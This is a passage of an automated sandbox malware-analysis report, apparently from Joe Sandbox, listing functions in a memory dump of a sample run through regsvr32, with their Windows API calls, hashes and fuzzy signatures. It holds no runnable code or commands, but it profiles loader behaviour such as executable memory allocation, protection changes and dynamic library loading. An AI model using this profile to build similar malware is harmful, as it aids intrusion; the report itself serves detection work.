                • GetCurrentThreadId.KERNEL32 ref: 04BD0D8C
                • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0D98
                • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0DA6
                • lstrcpy.KERNEL32(00000000), ref: 04BD0DC8
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
                • String ID:
                • API String ID: 1175089793-0
                • Opcode ID: 9c6d2fd210d063337ed191f28860799952068c5c235c5027131e3d90dd209c52
                • Instruction ID: d8af638b1a7e1032dd681f843d7955fb9d34e4a85126a5a7925a62cfd1aa3ee7
                • Opcode Fuzzy Hash: 9c6d2fd210d063337ed191f28860799952068c5c235c5027131e3d90dd209c52
                • Instruction Fuzzy Hash: 49016132600215AB97117BA69C88D6B7BACDFC5B45B0900A7BD05E7101EA74F80197B1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BCD689 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 110COMMON
                Download Yara Rule
                APIs
                • memset.NTDLL ref: 04BCD734
                • FlushFileBuffers.KERNEL32(00000000,?,00000000,00000000), ref: 04BCD79B
                • GetLastError.KERNEL32(?,00000000,00000000), ref: 04BCD7A5
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: BuffersErrorFileFlushLastmemset
                • String ID: K$P
                • API String ID: 3817869962-420285281
                • Opcode ID: e7d1f8851af4e43237cc2be909f6ace1f2b303c5c381527f4133107e0ab4af06
                • Instruction ID: 06aac96073fcb4daa56f1bf0862b08a65144ab3b0c482f2c08e62a11a1db677d
                • Opcode Fuzzy Hash: e7d1f8851af4e43237cc2be909f6ace1f2b303c5c381527f4133107e0ab4af06
                • Instruction Fuzzy Hash: 03416D74A006059FDB24DFA4C9846ABBBF9FF98B04F54487ED49693680E334B914CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BE2EF9 Relevance: 8.9, APIs: 7, Instructions: 108stringCOMMON
                Download Yara Rule
                APIs
                • memcpy.NTDLL(?,04BD3804,00000000,?,?,?,04BD3804,?,?,?,?,?), ref: 04BE2F37
                • lstrlen.KERNEL32(04BD3804,?,?,?,04BD3804,?,?,?,?,?), ref: 04BE2F55
                • memcpy.NTDLL(?,?,?,?,?,?,?), ref: 04BE2FC4
                • lstrlen.KERNEL32(04BD3804,00000000,00000000,?,?,?,04BD3804,?,?,?,?,?), ref: 04BE2FE5
                • lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 04BE2FF9
                • memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 04BE3002
                • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 04BE3010
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: lstrlenmemcpy$FreeLocal
                • String ID:
                • API String ID: 1123625124-0
                • Opcode ID: ef3d5108a805e6a6bf14f149142cd775944aef5e498e6d42b3d4440e853ba518
                • Instruction ID: 2adc34cf88069f581cf202f983def562fe28d6ba4f61d93df020470c38ce0362
                • Opcode Fuzzy Hash: ef3d5108a805e6a6bf14f149142cd775944aef5e498e6d42b3d4440e853ba518
                • Instruction Fuzzy Hash: 9941067290021AAFDF10DF6ADD419AF3BA8EF54364B0540A6FD04A7211E731EE609BE1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BE4C0C Relevance: 7.7, APIs: 6, Instructions: 163COMMON
                Download Yara Rule
                APIs
                • memcpy.NTDLL(?,?,00000010,?,00000110,?), ref: 04BE4C5D
                • memcpy.NTDLL(00000000,?,?,0000011F,?,00000110,?), ref: 04BE4CF0
                • GetLastError.KERNEL32(?,?,0000011F,?,00000110,?), ref: 04BE4D48
                • GetLastError.KERNEL32(?,00000110,?), ref: 04BE4D7A
                • GetLastError.KERNEL32(?,00000110,?), ref: 04BE4D8E
                • GetLastError.KERNEL32(?,00000110,?,?,?,?,?,?,?,?,?,?,?,04BC21D6,00000000,?), ref: 04BE4DA3
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: ErrorLast$memcpy
                • String ID:
                • API String ID: 2760375183-0
                • Opcode ID: 47b9aa28513bb73b3714f447fd94115f06b58a17dfad254413fa7abf72bfe79a
                • Instruction ID: 1e61d625f78c23ffe14c74dbf4018dd26a4e07e81c644daa21d67146037d6047
                • Opcode Fuzzy Hash: 47b9aa28513bb73b3714f447fd94115f06b58a17dfad254413fa7abf72bfe79a
                • Instruction Fuzzy Hash: 83514171900209FFDB10DFAAD884AEEBBB9EB84354F008466F915E7240E775AE50DB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD24CF Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 146stringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 04BC8F9E: RtlAllocateHeap.NTDLL(00000000,?,04BC2180), ref: 04BC8FAA
                • lstrcpy.KERNEL32(?,00000020), ref: 04BD25CC
                • lstrcat.KERNEL32(?,00000020), ref: 04BD25E1
                • lstrcmp.KERNEL32(00000000,?), ref: 04BD25F8
                • lstrlen.KERNEL32(?,?,D448B889,00000000,69B25F44), ref: 04BD261C
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                • String ID:
                • API String ID: 3214092121-3916222277
                • Opcode ID: 8f5a95288ace878855bdce2763c34ac606768f28b5b3781fc1a8ac65151cd734
                • Instruction ID: 850df66f77abc7c77a20b4c7575fccdf18d22861c21eccb651db42b5c91b3ac5
                • Opcode Fuzzy Hash: 8f5a95288ace878855bdce2763c34ac606768f28b5b3781fc1a8ac65151cd734
                • Instruction Fuzzy Hash: A251E331A00248EFDF29CF99C994AADBBB6FF55318F0480DAE8559F201E770BA41CB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD665E Relevance: 7.6, APIs: 5, Instructions: 133registrysynchronizationthreadCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 04BDD39D: lstrlenW.KERNEL32(?,00000000,74E069A0,?,00000250,?,00000000), ref: 04BDD3E9
                  • Part of subcall function 04BDD39D: lstrlenW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,04BC39E4), ref: 04BDD3F5
                  • Part of subcall function 04BDD39D: memset.NTDLL ref: 04BDD43D
                  • Part of subcall function 04BDD39D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04BDD458
                  • Part of subcall function 04BDD39D: lstrlenW.KERNEL32(0000002C), ref: 04BDD490
                  • Part of subcall function 04BDD39D: lstrlenW.KERNEL32(?), ref: 04BDD498
                  • Part of subcall function 04BDD39D: memset.NTDLL ref: 04BDD4BB
                  • Part of subcall function 04BDD39D: wcscpy.NTDLL ref: 04BDD4CD
                • WaitForSingleObject.KERNEL32(00000000,?,06249998,?,00000000,00000000,00000001), ref: 04BD6708
                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04BD6742
                • RegCloseKey.ADVAPI32(?), ref: 04BD676E
                • WaitForSingleObject.KERNEL32(00000000,Function_0000E2C5,04BEE374), ref: 04BD67D2
                • RtlExitUserThread.NTDLL(?), ref: 04BD6808
                  • Part of subcall function 04BD680F: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,04BDDB2C,00000000,?,?), ref: 04BD682D
                  • Part of subcall function 04BD680F: GetFileSize.KERNEL32(00000000,00000000,?,?,04BDDB2C,00000000,?,?,?,?,00000000,04BCC692,?,?,?,?), ref: 04BD683D
                  • Part of subcall function 04BD680F: CloseHandle.KERNEL32(000000FF,?,?,04BDDB2C,00000000,?,?,?,?,00000000,04BCC692,?,?,?,?,00000000), ref: 04BD689F
                  • Part of subcall function 04BE36FE: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,04BE4FFC), ref: 04BE373F
                  • Part of subcall function 04BE36FE: GetLastError.KERNEL32 ref: 04BE3749
                  • Part of subcall function 04BE36FE: WaitForSingleObject.KERNEL32(000000C8), ref: 04BE376E
                  • Part of subcall function 04BE36FE: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 04BE378F
                  • Part of subcall function 04BE36FE: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 04BE37B7
                  • Part of subcall function 04BE36FE: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 04BE37CC
                  • Part of subcall function 04BE36FE: SetEndOfFile.KERNEL32(00000006), ref: 04BE37D9
                  • Part of subcall function 04BE36FE: CloseHandle.KERNEL32(00000006), ref: 04BE37F1
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: File$lstrlen$CloseCreateObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerSizeThreadUserWritewcscpy
                • String ID:
                • API String ID: 796380773-0
                • Opcode ID: 8fe7e7c4654ac0b5fdd0502fd446e68e5c4eb4547aa30843b7ed569787b8a784
                • Instruction ID: 7645ee5e5d0511884fbcd477a87266cbbfb74e6587d179cddf2e512241ceb988
                • Opcode Fuzzy Hash: 8fe7e7c4654ac0b5fdd0502fd446e68e5c4eb4547aa30843b7ed569787b8a784
                • Instruction Fuzzy Hash: F6517075A0010AAFEB14DFA6DD85FAA77BCEB84304F0140A6F605EB251E774EE44CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BDE555 Relevance: 7.6, APIs: 5, Instructions: 102synchronizationCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 04BCC9D1: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 04BCC9DD
                  • Part of subcall function 04BCC9D1: SetLastError.KERNEL32(000000B7,?,04BDE569,?,?,00000000,?,?,?), ref: 04BCC9EE
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 04BDE589
                • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 04BDE661
                  • Part of subcall function 04BD5FA2: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 04BD5FBC
                  • Part of subcall function 04BD5FA2: CreateWaitableTimerA.KERNEL32(04BEE268,00000003,?), ref: 04BD5FD9
                  • Part of subcall function 04BD5FA2: GetLastError.KERNEL32(?,?,04BDE5BD,?,?,?,00000000,?,?,?), ref: 04BD5FEA
                  • Part of subcall function 04BD5FA2: GetSystemTimeAsFileTime.KERNEL32(?,00000000,04BDE5BD,?,?,?,04BDE5BD,?), ref: 04BD602A
                  • Part of subcall function 04BD5FA2: SetWaitableTimer.KERNEL32(00000000,04BDE5BD,00000000,00000000,00000000,00000000,?,?,04BDE5BD,?), ref: 04BD6049
                  • Part of subcall function 04BD5FA2: HeapFree.KERNEL32(00000000,04BDE5BD,00000000,04BDE5BD,?,?,?,04BDE5BD,?), ref: 04BD605F
                • GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 04BDE64A
                • ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 04BDE653
                  • Part of subcall function 04BCC9D1: CreateMutexA.KERNEL32(04BEE268,00000000,?,?,04BDE569,?,?,00000000,?,?,?), ref: 04BCCA01
                • GetLastError.KERNEL32(?,?,00000000,?,?,?), ref: 04BDE66E
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
                • String ID:
                • API String ID: 1700416623-0
                • Opcode ID: 016ab87063acefca6c2c858eaea8a597164dce1c31bf34d64fb241907d2f882d
                • Instruction ID: aee952aee718b2804c39406e2ab7ff20962ef99645286ec665d581dbb1e49160
                • Opcode Fuzzy Hash: 016ab87063acefca6c2c858eaea8a597164dce1c31bf34d64fb241907d2f882d
                • Instruction Fuzzy Hash: 9C31AE75A00205ABCB21AF76DC8486EBBB9FFC9305B1444ABE802DF250F675E850CB31
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BDA5E1 Relevance: 7.6, APIs: 5, Instructions: 101memoryCOMMON
                Download Yara Rule
                APIs
                • RtlImageNtHeader.NTDLL(00000000), ref: 04BDA5FA
                  • Part of subcall function 04BCE9B0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,04BDBCFE), ref: 04BCE9D6
                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,04BC7B94,00000000), ref: 04BDA63C
                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000001), ref: 04BDA68E
                • VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,00000000,00000000,?,00000000,00000000,00000001,?,00000000,04BC7B94,00000000), ref: 04BDA6A7
                  • Part of subcall function 04BD83BC: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 04BD83DD
                  • Part of subcall function 04BD83BC: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,?,?,?,04BDA62D,00000000,00000000,00000000,00000001,?,00000000), ref: 04BD8420
                • GetLastError.KERNEL32(?,00000000,04BC7B94,00000000,?,?,?,?,?,?,?,04BC8D64,?), ref: 04BDA6DF
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
                • String ID:
                • API String ID: 1921436656-0
                • Opcode ID: 4e96be77bcb446b3e3c8341d8181ecc0b6a3a8741b2198d4058fb976f5495b4c
                • Instruction ID: 8722893223465b19d890e2f9b98c0e98af4a4504bdcfac1b11e95dea9ae77c2e
                • Opcode Fuzzy Hash: 4e96be77bcb446b3e3c8341d8181ecc0b6a3a8741b2198d4058fb976f5495b4c
                • Instruction Fuzzy Hash: DF313E75A00209EFDF11EFA5DD40AAE7BB9EB48750F0040E6E905EB250E774AE40DBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD35E9 Relevance: 7.6, APIs: 5, Instructions: 89memorystringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 04BD20E3: RtlEnterCriticalSection.NTDLL(04BEE4A8), ref: 04BD20EB
                  • Part of subcall function 04BD20E3: RtlLeaveCriticalSection.NTDLL(04BEE4A8), ref: 04BD2100
                  • Part of subcall function 04BD20E3: InterlockedIncrement.KERNEL32(0000001C), ref: 04BD2119
                • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 04BD3620
                • memcpy.NTDLL(00000000,?,?,?,00000000,?,?,?,?,?,?,?,04BDC9D5,?,00000000), ref: 04BD3631
                • lstrcmpi.KERNEL32(00000002,?), ref: 04BD3677
                • memcpy.NTDLL(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,04BDC9D5,?,00000000), ref: 04BD368B
                • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,04BDC9D5,?,00000000), ref: 04BD36D1
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
                • String ID:
                • API String ID: 733514052-0
                • Opcode ID: 0e843c24b869a548f985af6bc00ed7464833bc95c414f524c98a5b1dd54e856f
                • Instruction ID: eb1cf576ee79ee708117dfa7328ccd4cc1ca3ecddee8a2465ebf75823febd319
                • Opcode Fuzzy Hash: 0e843c24b869a548f985af6bc00ed7464833bc95c414f524c98a5b1dd54e856f
                • Instruction Fuzzy Hash: 4531A272A00219BFDB10EFA5DC84A9E7BF8FB44614F1400E9E905EB201E735ED44CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD653E Relevance: 7.6, APIs: 5, Instructions: 83libraryloaderCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryA.KERNEL32(?,?,00000000,00000000,04BDE937,00000000,74E5F5B0,04BD47CC,?,00000001), ref: 04BD655E
                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,04BC8D64,?,?,?,?,?), ref: 04BD6573
                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,04BC8D64,?,?,?,?,?), ref: 04BD658F
                • GetProcAddress.KERNEL32(00000000,?), ref: 04BD65A4
                • GetProcAddress.KERNEL32(00000000,?), ref: 04BD65B8
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: LibraryLoad$AddressProc
                • String ID:
                • API String ID: 1469910268-0
                • Opcode ID: 0656100cf764a258876cde379140351a51c9e835ee92d61cf264339836639502
                • Instruction ID: f710d6c56eb715e914be17c340bbd5e80846c0dc55c24083455d8ad90f2fe58c
                • Opcode Fuzzy Hash: 0656100cf764a258876cde379140351a51c9e835ee92d61cf264339836639502
                • Instruction Fuzzy Hash: DF318D32A012069FDB00DF6AE980A5073E8FBC9314B01019BE508DF311E779FC428F66
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BC5D47 Relevance: 7.6, APIs: 5, Instructions: 81filememoryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 04BD0D54: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74E05520,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0D66
                  • Part of subcall function 04BD0D54: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0D7F
                  • Part of subcall function 04BD0D54: GetCurrentThreadId.KERNEL32 ref: 04BD0D8C
                  • Part of subcall function 04BD0D54: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0D98
                  • Part of subcall function 04BD0D54: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0DA6
                  • Part of subcall function 04BD0D54: lstrcpy.KERNEL32(00000000), ref: 04BD0DC8
                • DeleteFileA.KERNEL32(00000000,000004D2), ref: 04BC5D6A
                • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 04BC5D73
                • GetLastError.KERNEL32 ref: 04BC5D7D
                • HeapFree.KERNEL32(00000000,00000000), ref: 04BC5E3C
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
                • String ID:
                • API String ID: 3543646443-0
                • Opcode ID: 9425e5b44a3782a9e3b05bb81ab1ea1413cb0dabe714b5bd0df41edd941d5a7f
                • Instruction ID: 6ae525a854b6ff69ac7d7322b85e80ced67a51c948cc8f885816abc0325027f7
                • Opcode Fuzzy Hash: 9425e5b44a3782a9e3b05bb81ab1ea1413cb0dabe714b5bd0df41edd941d5a7f
                • Instruction Fuzzy Hash: 2F2141B2601519ABE710BBB5EC8CE86339DDF86315F010096FA09DB162DA39F904DBB1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BDBC40 Relevance: 7.6, APIs: 5, Instructions: 71memoryCOMMON
                Download Yara Rule
                APIs
                • StrChrA.SHLWAPI(04BC158F,0000002C,00000000,?,00000000,6D3C2A4F,6D3C2A4F,?,04BDCB18,?,04BC159F,04BC158F,00000000,0000000B,?,04BC158F), ref: 04BDBC51
                • StrRChrA.SHLWAPI(04BC158F,00000000,0000002F,?,00000000,6D3C2A4F,6D3C2A4F,?,04BDCB18,?,04BC159F,04BC158F,00000000,0000000B,?,04BC158F), ref: 04BDBC6A
                • StrTrimA.SHLWAPI(04BC158F,?,?,00000000,6D3C2A4F,6D3C2A4F,?,04BDCB18,?,04BC159F,04BC158F,00000000,0000000B,?,04BC158F,04BC158F), ref: 04BDBC92
                • StrTrimA.SHLWAPI(00000000,?,?,00000000,6D3C2A4F,6D3C2A4F,?,04BDCB18,?,04BC159F,04BC158F,00000000,0000000B,?,04BC158F,04BC158F), ref: 04BDBCA1
                • HeapFree.KERNEL32(00000000,04BC158F,04BC158F,00000000,00000000,?,00000000,6D3C2A4F,6D3C2A4F,?,04BDCB18,?,04BC159F,04BC158F,00000000,0000000B), ref: 04BDBCD8
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Trim$FreeHeap
                • String ID:
                • API String ID: 2132463267-0
                • Opcode ID: bb619916e605f6218e1041071be6e2150eaa7383f40799f9b4c61339c241ba6d
                • Instruction ID: e651bd568922202b12280a2a6cdfc8c4908c337bbe009f169eabb32cc0591b21
                • Opcode Fuzzy Hash: bb619916e605f6218e1041071be6e2150eaa7383f40799f9b4c61339c241ba6d
                • Instruction Fuzzy Hash: 8411CB3620421BFBDB219A6ADC85F977BACFB84750F1500A2F908DB141EBB4FD018B60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD77FD Relevance: 7.6, APIs: 5, Instructions: 68memoryCOMMON
                Download Yara Rule
                APIs
                • VirtualProtect.KERNEL32(00000000,00000004,00000040,00000000,016595A8,00000000,04BC7B94,?,?,?,04BCA457,74E05520,?,04BDA6F4,00000000,00000000), ref: 04BD7834
                • VirtualProtect.KERNEL32(00000000,00000004,00000000,00000000,?,04BCA457,74E05520,?,04BDA6F4,00000000,00000000,?,00000000,04BC7B94,00000000), ref: 04BD7864
                • RtlEnterCriticalSection.NTDLL(04BEE480), ref: 04BD7873
                • RtlLeaveCriticalSection.NTDLL(04BEE480), ref: 04BD7891
                • GetLastError.KERNEL32(?,04BCA457,74E05520,?,04BDA6F4,00000000,00000000,?,00000000,04BC7B94,00000000), ref: 04BD78A1
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                • String ID:
                • API String ID: 653387826-0
                • Opcode ID: ed5c37073bc2a3b211508b1bd0bc84b4aa5fd950fd28ddc087e45903b68dfaa8
                • Instruction ID: a8f5b0e34ab7870ff0ff040b84ee09b69fea77bd25c1c82433b2fbfc2f207a02
                • Opcode Fuzzy Hash: ed5c37073bc2a3b211508b1bd0bc84b4aa5fd950fd28ddc087e45903b68dfaa8
                • Instruction Fuzzy Hash: CC21E9B5600B01EFE711DFAAC98595AB7F8FF08304B0086AAEA55D7710E774F914CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BCE6FF Relevance: 7.6, APIs: 5, Instructions: 61stringtimeCOMMON
                Download Yara Rule
                APIs
                • lstrcmpi.KERNEL32(00000000,?), ref: 04BCE72E
                • RtlEnterCriticalSection.NTDLL(04BEE4A8), ref: 04BCE73B
                • RtlLeaveCriticalSection.NTDLL(04BEE4A8), ref: 04BCE74E
                • lstrcmpi.KERNEL32(04BEE4C0,00000000), ref: 04BCE76E
                • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04BCC02E,00000000), ref: 04BCE782
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
                • String ID:
                • API String ID: 1266740956-0
                • Opcode ID: c7326c03b4d2c395c41c96e0886eb839efafe06c6339792af316c2c7c35032e8
                • Instruction ID: b161e56a7d77da863d369a978e8f5aea7c06fe04aa65a6289a95b79b26b08278
                • Opcode Fuzzy Hash: c7326c03b4d2c395c41c96e0886eb839efafe06c6339792af316c2c7c35032e8
                • Instruction Fuzzy Hash: D9114F32501205EFEB05DF5ED889A5DB7B8FF88334F05459AE409A7290D738ED41CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BC3FF7 Relevance: 7.6, APIs: 5, Instructions: 60stringCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(04BC158F,00000000,04BE6C5B,00000000,04BE4160,04BC158F,?,?,04BDCD80,?,04BC159F,04BC158F,00000000,0000000B,?,04BC158F), ref: 04BC4001
                  • Part of subcall function 04BC8F9E: RtlAllocateHeap.NTDLL(00000000,?,04BC2180), ref: 04BC8FAA
                • lstrcpy.KERNEL32(00000000,04BC158F), ref: 04BC4025
                • StrRChrA.SHLWAPI(04BC158F,00000000,0000002E,?,00000003,?,?,04BDCD80,?,04BC159F,04BC158F,00000000,0000000B,?,04BC158F,04BC158F), ref: 04BC402C
                • lstrcpy.KERNEL32(00000000,?), ref: 04BC4074
                • lstrcat.KERNEL32(00000000,?), ref: 04BC4083
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: lstrcpy$AllocateHeaplstrcatlstrlen
                • String ID:
                • API String ID: 2616531654-0
                • Opcode ID: f586b7983eceda502cc467c8e383402b7aaa3013cb74bfb88a108f7a85ab7255
                • Instruction ID: a1d923baf5208ef9eb3e164ec895d1770ea5feb776ef7edbb858f20ff1ce06a1
                • Opcode Fuzzy Hash: f586b7983eceda502cc467c8e383402b7aaa3013cb74bfb88a108f7a85ab7255
                • Instruction Fuzzy Hash: 7F11C232240606ABD320EE7AE9C8E6BB7ECEBC4751F05456EF505C7202DB65E904C772
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD265B Relevance: 7.6, APIs: 5, Instructions: 59memoryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 04BDBDF1: lstrlen.KERNEL32(?,00000001,?,00000008,04BDD288,?,00000000,00000001,00000000,0624C088,0624C088,00000000,04BC832B,00000000,?,?), ref: 04BDBDFD
                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 04BD2684
                • memcpy.NTDLL(00000000,?,?), ref: 04BD2697
                • RtlEnterCriticalSection.NTDLL(04BEE4A8), ref: 04BD26A8
                • RtlLeaveCriticalSection.NTDLL(04BEE4A8), ref: 04BD26BD
                • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 04BD26F5
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
                • String ID:
                • API String ID: 2349942465-0
                • Opcode ID: 3faf5c7f5cdd4e216843000b857974dd699b1c1bda8d2706756db44512fff8d8
                • Instruction ID: 9662687b5894ce2987bcfb7ed4685878ab3c949505f3111c7de8fc9555d9b922
                • Opcode Fuzzy Hash: 3faf5c7f5cdd4e216843000b857974dd699b1c1bda8d2706756db44512fff8d8
                • Instruction Fuzzy Hash: 2011CE72105250AFE711AF2AEC84C2B7B78EFC9335B0504EBF80597241EB39AC059BB1
